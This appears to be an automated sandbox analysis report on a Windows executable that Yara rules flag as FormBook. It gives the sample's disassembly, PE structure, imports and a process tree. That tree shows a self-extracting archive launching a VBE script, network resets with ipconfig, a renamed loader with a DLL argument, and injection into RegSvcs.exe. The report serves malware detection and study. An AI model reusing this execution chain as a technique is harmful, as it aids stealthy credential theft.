                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007F08A4D737F7h
                                                            int3
                                                            jmp 00007F08A4D7952Eh
                                                            int3
                                                            int3
                                                            push 004293C0h
                                                            push dword ptr fs:[00000000h]
                                                            mov eax, dword ptr [esp+10h]
                                                            mov dword ptr [esp+10h], ebp
                                                            lea ebp, dword ptr [esp+10h]
                                                            sub esp, eax
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            mov eax, dword ptr [00449778h]
                                                            xor dword ptr [ebp-04h], eax
                                                            xor eax, ebp
                                                            push eax
                                                            mov dword ptr [ebp-18h], esp
                                                            push dword ptr [ebp-08h]
                                                            mov eax, dword ptr [ebp-04h]
                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                            mov dword ptr [ebp-08h], eax
                                                            lea eax, dword ptr [ebp-10h]
                                                            mov dword ptr fs:[00000000h], eax
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            mov ecx, dword ptr [ebp-10h]
                                                            mov dword ptr fs:[00000000h], ecx
                                                            pop ecx
                                                            pop edi
                                                            pop edi
                                                            pop esi
                                                            pop ebx
                                                            mov esp, ebp
                                                            pop ebp
                                                            push ecx
                                                            ret
                                                            push ebp
                                                            mov ebp, esp

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x47d700x34.rdata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x47da40x50.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000xc398.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x650000x2afc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x445800x54.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x446000x18.rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3ec580x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x280.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4722c0x120.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x3a32c0x3a400e320764e1b3c816ba80aeb820cb8a274False0.581381605418455data6.685359764265178IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x3c0000xcbf80xcc0047c3be3304bfdfb2a778f355849d1c3fFalse0.4439529718137255data5.167069652624378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x490000xd7e00x12006335f9314c2900dccb530e151f1b1ee8False0.3956163194444444data4.0290550032041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .didat0x570000x1a80x200232a8fe82993b55cefe09cffc39a79b0False0.462890625data3.5080985761326375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x580000xc3980xc4003b0908233482a15c44e0d8b6a6c3707eFalse0.5938097895408163data5.923234714497879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x650000x2afc0x2c0098fd4bc572f87a21f69dc57f720a6dbcFalse0.75data6.617141671767599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            PNG0x587640xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                            PNG0x592ac0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                            RT_ICON0x5a8580x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.4945121951219512
                                                            RT_ICON0x5aec00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.6129032258064516
                                                            RT_ICON0x5b1a80x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.5840163934426229
                                                            RT_ICON0x5b3900x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.6317567567567568
                                                            RT_ICON0x5b4b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.6244669509594882
                                                            RT_ICON0x5c3600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.766245487364621
                                                            RT_ICON0x5cc080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.7695852534562212
                                                            RT_ICON0x5d2d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.5664739884393064
                                                            RT_ICON0x5d8380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5528008298755187
                                                            RT_ICON0x5fde00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.6235928705440901
                                                            RT_ICON0x60e880x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.6442622950819672
                                                            RT_ICON0x618100x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.7180851063829787
                                                            RT_DIALOG0x61c780x286dataEnglishUnited States0.5092879256965944
                                                            RT_DIALOG0x61f000x13adataEnglishUnited States0.60828025477707
                                                            RT_DIALOG0x6203c0xecdataEnglishUnited States0.6991525423728814
                                                            RT_DIALOG0x621280x12edataEnglishUnited States0.5927152317880795
                                                            RT_DIALOG0x622580x338dataEnglishUnited States0.45145631067961167
                                                            RT_DIALOG0x625900x252dataEnglishUnited States0.5757575757575758
                                                            RT_STRING0x627e40x1e2dataEnglishUnited States0.3900414937759336
                                                            RT_STRING0x629c80x1ccdataEnglishUnited States0.4282608695652174
                                                            RT_STRING0x62b940x1b8dataEnglishUnited States0.45681818181818185
                                                            RT_STRING0x62d4c0x146dataEnglishUnited States0.5153374233128835
                                                            RT_STRING0x62e940x46cdataEnglishUnited States0.3454063604240283
                                                            RT_STRING0x633000x166dataEnglishUnited States0.49162011173184356
                                                            RT_STRING0x634680x152dataEnglishUnited States0.5059171597633136
                                                            RT_STRING0x635bc0x10adataEnglishUnited States0.49624060150375937
                                                            RT_STRING0x636c80xbcdataEnglishUnited States0.6329787234042553
                                                            RT_STRING0x637840x1c0dataEnglishUnited States0.5178571428571429
                                                            RT_STRING0x639440x250dataEnglishUnited States0.44256756756756754
                                                            RT_GROUP_ICON0x63b940xaedata0.5977011494252874
                                                            RT_MANIFEST0x63c440x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            No network behavior found

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:13:01:50
                                                            Start date:05/12/2024
                                                            Path:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\uhbrQkYNzx.exe"
                                                            Imagebase:0x990000
                                                            File size:1'264'257 bytes
                                                            MD5 hash:C98EEA303DA1D7B92F96D6A8B62D74D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:13:01:56
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe"
                                                            Imagebase:0x780000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:13:02:06
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dll
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:ipconfig /release
                                                            Imagebase:0x2b0000
                                                            File size:29'184 bytes
                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            Wow64 process (32bit):true
                                                            Commandline:tguujh.msc nhhjmppg.dll
                                                            Imagebase:0xc50000
                                                            File size:947'288 bytes
                                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:14:20:48
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:14:20:48
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:14:20:49
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:ipconfig /renew
                                                            Imagebase:0x2b0000
                                                            File size:29'184 bytes
                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:14:20:57
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x790000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:14:20:57
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x460000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:14:21:03
                                                            Start date:05/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
                                                            Imagebase:0xbc0000
                                                            File size:947'288 bytes
                                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:14:21:11
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x80000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:14:21:11
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x3a0000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:21
                                                            Start time:14:21:11
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 80
                                                            Imagebase:0xad0000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:11.1%
                                                              Total number of Nodes:1899
                                                              Total number of Limit Nodes:27
                                                              execution_graph 28061 9b4cda 28062 9b4c88 28061->28062 28064 9b4fce 28062->28064 28090 9b4d2c 28064->28090 28066 9b4fde 28067 9b503b 28066->28067 28068 9b505f 28066->28068 28069 9b4f6c DloadReleaseSectionWriteAccess 8 API calls 28067->28069 28072 9b50d7 LoadLibraryExA 28068->28072 28074 9b5138 28068->28074 28079 9b514a 28068->28079 28085 9b5206 28068->28085 28070 9b5046 RaiseException 28069->28070 28071 9b5234 28070->28071 28071->28062 28073 9b50ea GetLastError 28072->28073 28072->28074 28076 9b50fd 28073->28076 28077 9b5113 28073->28077 28075 9b5143 FreeLibrary 28074->28075 28074->28079 28075->28079 28076->28074 28076->28077 28080 9b4f6c DloadReleaseSectionWriteAccess 8 API calls 28077->28080 28078 9b51a8 GetProcAddress 28081 9b51b8 GetLastError 28078->28081 28078->28085 28079->28078 28079->28085 28082 9b511e RaiseException 28080->28082 28083 9b51cb 28081->28083 28082->28071 28083->28085 28086 9b4f6c DloadReleaseSectionWriteAccess 8 API calls 28083->28086 28101 9b4f6c 28085->28101 28087 9b51ec RaiseException 28086->28087 28088 9b4d2c ___delayLoadHelper2@8 8 API calls 28087->28088 28089 9b5203 28088->28089 28089->28085 28091 9b4d38 28090->28091 28092 9b4d5e 28090->28092 28109 9b4dd5 28091->28109 28092->28066 28094 9b4d3d 28095 9b4d59 28094->28095 28114 9b4efe 28094->28114 28119 9b4d5f GetModuleHandleW GetProcAddress GetProcAddress 28095->28119 28098 9b4fa7 28099 9b4fc3 28098->28099 28100 9b4fbf RtlReleaseSRWLockExclusive 28098->28100 28099->28066 28100->28066 28102 9b4f7e 28101->28102 28103 9b4fa0 28101->28103 28104 9b4dd5 DloadReleaseSectionWriteAccess 4 API calls 28102->28104 28103->28071 28105 9b4f83 28104->28105 28106 9b4f9b 28105->28106 28107 9b4efe DloadProtectSection 3 API calls 28105->28107 28122 9b4fa2 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 28106->28122 28107->28106 28120 9b4d5f GetModuleHandleW GetProcAddress GetProcAddress 28109->28120 28111 9b4dda 28112 9b4df2 RtlAcquireSRWLockExclusive 28111->28112 28113 9b4df6 28111->28113 28112->28094 28113->28094 28117 9b4f13 DloadProtectSection 28114->28117 28115 9b4f19 28115->28095 28116 9b4f4e VirtualProtect 28116->28115 28117->28115 28117->28116 28121 9b4e14 VirtualQuery GetSystemInfo 28117->28121 28119->28098 28120->28111 28121->28116 28122->28103 28123 9b437d 28124 9b4389 __EH_prolog3_GS 28123->28124 28141 9a4318 28124->28141 28130 9b43dc 28152 991a66 28130->28152 28134 9b43f5 28159 9b0678 PeekMessageW 28134->28159 28140 9b4430 28165 9b5787 28140->28165 28142 9a4328 28141->28142 28168 9a4349 28142->28168 28145 9a6a25 28203 9a68d4 28145->28203 28148 9925a4 28149 9925b2 28148->28149 28150 9925ad 28148->28150 28149->28130 28151 991a66 26 API calls 28150->28151 28151->28149 28153 991a71 28152->28153 28154 991a80 28152->28154 28270 9912a7 28153->28270 28156 991de7 28154->28156 28157 991df1 28156->28157 28158 991df3 SetDlgItemTextW 28156->28158 28157->28158 28158->28134 28160 9b06cc 28159->28160 28161 9b0693 GetMessageW 28159->28161 28160->28140 28164 9919a9 26 API calls 28160->28164 28162 9b06a9 IsDialogMessageW 28161->28162 28163 9b06b8 TranslateMessage DispatchMessageW 28161->28163 28162->28160 28162->28163 28163->28160 28164->28140 28166 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28165->28166 28167 9b4446 28166->28167 28174 9a347b 28168->28174 28171 9a436c LoadStringW 28172 9a4346 28171->28172 28173 9a4383 LoadStringW 28171->28173 28172->28145 28173->28172 28181 9a338e 28174->28181 28178 9a34bc 28191 9b5734 28178->28191 28180 9a34d1 28180->28171 28180->28172 28182 9a33c2 28181->28182 28190 9a3445 _strncpy 28181->28190 28186 9a33e2 28182->28186 28199 9a89ed WideCharToMultiByte 28182->28199 28183 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28185 9a3474 28183->28185 28185->28178 28198 9a34d5 26 API calls 28185->28198 28189 9a3413 28186->28189 28200 9a42b2 50 API calls __vsnprintf 28186->28200 28201 9bd097 26 API calls 3 library calls 28189->28201 28190->28183 28192 9b573d IsProcessorFeaturePresent 28191->28192 28193 9b573c 28191->28193 28195 9b5bfc 28192->28195 28193->28180 28202 9b5bbf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28195->28202 28197 9b5cdf 28197->28180 28198->28178 28199->28186 28200->28189 28201->28190 28202->28197 28204 9a68e0 __EH_prolog3_GS 28203->28204 28218 9a663b 28204->28218 28209 9a6929 28216 9a696e 28209->28216 28231 9a6a3d 28209->28231 28234 997ff0 28 API calls 28209->28234 28211 9a698e 28215 9a69d2 28211->28215 28236 9919a9 26 API calls 28211->28236 28212 9b5787 5 API calls 28214 9a69e8 28212->28214 28214->28148 28215->28212 28216->28211 28235 997ff0 28 API calls 28216->28235 28219 9a66df 28218->28219 28221 9a6651 28218->28221 28222 99adcc 28219->28222 28220 991b63 28 API calls 28220->28221 28221->28219 28221->28220 28223 99ae43 28222->28223 28225 99addd 28222->28225 28239 991a92 28 API calls std::_Xinvalid_argument 28223->28239 28230 99ade8 28225->28230 28237 9912d3 28 API calls Concurrency::cancel_current_task 28225->28237 28228 99ae17 28238 9911b8 28 API calls 28228->28238 28230->28209 28240 99f68d 28231->28240 28234->28209 28235->28211 28236->28215 28237->28228 28238->28230 28241 99f6a4 __vsnwprintf_l 28240->28241 28244 9bcee1 28241->28244 28247 9bafa4 28244->28247 28248 9bafcc 28247->28248 28249 9bafe4 28247->28249 28264 9c01d3 20 API calls _abort 28248->28264 28249->28248 28251 9bafec 28249->28251 28266 9bb543 38 API calls 2 library calls 28251->28266 28252 9bafd1 28265 9bac8e 26 API calls _abort 28252->28265 28255 9baffc 28267 9bb50e 20 API calls 2 library calls 28255->28267 28256 9bafdc 28258 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28256->28258 28260 99f6ae 28258->28260 28259 9bb074 28268 9bb8f3 51 API calls 3 library calls 28259->28268 28260->28209 28263 9bb07f 28269 9bb5c6 20 API calls _free 28263->28269 28264->28252 28265->28256 28266->28255 28267->28259 28268->28263 28269->28256 28271 9912b4 28270->28271 28273 9912c1 28270->28273 28274 9919a9 26 API calls 28271->28274 28273->28154 28274->28273 28275 9b2813 28307 997673 28275->28307 28277 9b2a9a 28278 9b2af7 28277->28278 28279 997673 28 API calls 28277->28279 28362 9958cb 45 API calls 28278->28362 28281 9b2aec 28279->28281 28311 9b38a0 28281->28311 28283 9b2832 _wcslen 28283->28277 28283->28278 28349 99120c 28283->28349 28287 9b28fe 28358 9a645a 28 API calls 28287->28358 28293 9b2a01 28298 9b2a39 28293->28298 28360 9919a9 26 API calls 28293->28360 28298->28277 28361 9919a9 26 API calls 28298->28361 28302 9914a7 28 API calls 28306 9b292f 28302->28306 28303 99adaa CompareStringW 28303->28306 28304 991a66 26 API calls 28304->28306 28306->28293 28306->28302 28306->28303 28306->28304 28359 9a645a 28 API calls 28306->28359 28308 99768c 28307->28308 28363 997430 28308->28363 28310 997699 28310->28283 28317 9b38ac __cftof __EH_prolog3_GS 28311->28317 28312 991a66 26 API calls 28313 9b3bcf 28312->28313 28314 9b5787 5 API calls 28313->28314 28315 9b3bd4 28314->28315 28315->28278 28316 9b3a1e 28375 9914a7 28316->28375 28317->28316 28331 9b3ba8 28317->28331 28388 9a8da4 CompareStringW 28317->28388 28323 991a66 26 API calls 28324 9b3a4b 28323->28324 28325 9b3a9d ShellExecuteExW 28324->28325 28326 9914a7 28 API calls 28324->28326 28327 9b3b7c 28325->28327 28328 9b3ab2 28325->28328 28329 9b3a71 28326->28329 28327->28331 28391 9919a9 26 API calls 28327->28391 28332 9b3ace IsWindowVisible 28328->28332 28333 9b3ae5 WaitForInputIdle 28328->28333 28338 9b3b30 CloseHandle 28328->28338 28389 9a0e49 51 API calls 2 library calls 28329->28389 28331->28312 28332->28333 28334 9b3ad9 ShowWindow 28332->28334 28382 9b3fcf WaitForSingleObject 28333->28382 28334->28333 28336 9b3a82 28340 991a66 26 API calls 28336->28340 28341 9b3b3d 28338->28341 28342 9b3b48 28338->28342 28339 9b3afb 28339->28338 28345 9b3b08 GetExitCodeProcess 28339->28345 28343 9b3a8e 28340->28343 28390 9a8da4 CompareStringW 28341->28390 28342->28327 28346 9b3b73 ShowWindow 28342->28346 28343->28325 28345->28338 28347 9b3b19 28345->28347 28346->28327 28347->28338 28350 99127d 28349->28350 28353 99121d 28349->28353 28491 991a92 28 API calls std::_Xinvalid_argument 28350->28491 28357 991228 28353->28357 28489 9912d3 28 API calls 